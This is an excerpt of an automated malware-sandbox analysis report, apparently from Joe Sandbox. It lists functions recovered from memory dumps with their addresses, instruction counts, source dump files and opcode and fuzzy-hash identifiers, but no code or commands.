                                                                                                                                                                                                                                                                                      Function 024DB2C4 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                      • Instruction ID: bfa9a9c96b699f8e7a8cd82cce4b282524c487e2f69033ba1994abd8c055a1ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6317775A587148FC328EFA4E8D057BB3A1EB8B318F1F852D85E50B350E7B09D019649
                                                                                                                                                                                                                                                                                      Function 024C60F7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                                      • Instruction ID: f376a394c9daf494ef926e96f763dcf9c0e09d31fc5128e084986723f8e8bf14
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6141BFB66093908BC734CF24C85179FBAF6EBD1214F498E2CD4CAAB341E73589058B87
                                                                                                                                                                                                                                                                                      Function 0042C45C Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                                      • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                                                      Function 0042ADF4 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                      • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                                                      Function 024CB05B Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e053c2823382fd1086c19bf344067b4178792cdea3cf3ad4da39b518267e675
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38318FA41083D18ADB358F289021BFBBBE0EB9325DF24999DC2D5A7783D7344047CB5A
                                                                                                                                                                                                                                                                                      Function 024CC6C3 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                                      • Instruction ID: 69993fb1a6516e4a5aa29d158f2d0ee3cdf2efe4e9ef0560cf45195b750a167f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 103109781197C24BD7E58B2C98A0BBBBBD2DF83204F38597ED0CE47292DB254445CB56
                                                                                                                                                                                                                                                                                      Function 024C89C0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                                      • Instruction ID: 5cb373d249fc8b22e8e06f3a1b2dcae0dc2e1784e741575700c59fc2ea25c6c1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E531723A2183048FC769CF288C9067BB352EB93748F2C893EDA8583341D376C9018B42
                                                                                                                                                                                                                                                                                      Function 0040D7A2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                                      • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                                                                      Function 024ADA09 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                                      • Instruction ID: da79bac0a07420a2ef8f93c46d00175ddd5317e70ad28d5172a1d58d54668b76
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D231F734B19501DBE7259B198C60B3677A3FBE6304F58D62EE0C283AA8DF30AC51CB14
                                                                                                                                                                                                                                                                                      Function 0043B9A1 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                                      • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                                                                      Function 024DBC08 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                                      • Instruction ID: 276525c3824755e645e5831f28ff524387c350aa219c812d4741741597a1fdcc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D210B2171879107D718DE3988E1227F7D3ABCB518F09CA3FC5A2976D5DA34D9068644
                                                                                                                                                                                                                                                                                      Function 024B6544 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                                      • Instruction ID: 759eb49988ef9dc5662f2e4247f32ba859080cacb43d08644275f87d0e5ad490
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE212334704B019FD321CF28D880B67B7E3EBC6724F258A28D5958B799CB30E852CB14
                                                                                                                                                                                                                                                                                      Function 0043BF40 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                                      • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                                                                                                                                                                                      Function 024C552B Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                                                      • Instruction ID: 14215b089a1d18e7858cef35c4fca0ce1d4bb7bbc3837bfeae10a02ccdb80f35
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 051101397483409BCB98DFA8D8E1A7FB3A1AB96304F98543EE1D2D3351C3B4D8018B46
                                                                                                                                                                                                                                                                                      Function 0043B195 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                                      • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                                                                                                                                                                                                                                                      Function 024DB3FC Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                                      • Instruction ID: 13a3b1e1d6b5590254559e18f3aa46bde775128d4579dfead35ea40a78bfed3c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1118875A587048FC318EFA4ECD023BB3A0EB9A318F1E853C85E607750EBA09D108609
                                                                                                                                                                                                                                                                                      Function 024B4806 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                                                      • Instruction ID: b4d15590a7e3b529111047dd982c06dcb6106d438afcded56d8fdd1de861cf00
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5c82fc671e06e79b78df2e2b48bef573e4aa83533a2b75342557a0be53bb444
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 710126347042805AFB584B288C61B7BB353EBD6B10F65952EE1C19B2D2EF708C428B16
                                                                                                                                                                                                                                                                                      Function 00433630 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                      • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                                                                                                                                                                                      Function 024D3897 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 20a4970c47ff13b46f95347267e7358a7c6e9867dbe4c3c199b790293e15a941
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA118233E451D50EC3168D3C8810579BFE30A93535B5983DAF4B9AB2D2D6238D8B8B56
                                                                                                                                                                                                                                                                                      Function 004299B0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                                                      • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                                                                                                                                                                                      Function 024C9C17 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                                                      • Instruction ID: f8772f1730968f63ea39806865f69cb2ef856afd2b609e9bbdad5812d1e835f2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3001F2F9700301E7E760EE1AC4C0B3BB2E9AF91B14F28043EC90947300DB72E815CAA5
                                                                                                                                                                                                                                                                                      Function 024C55B3 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
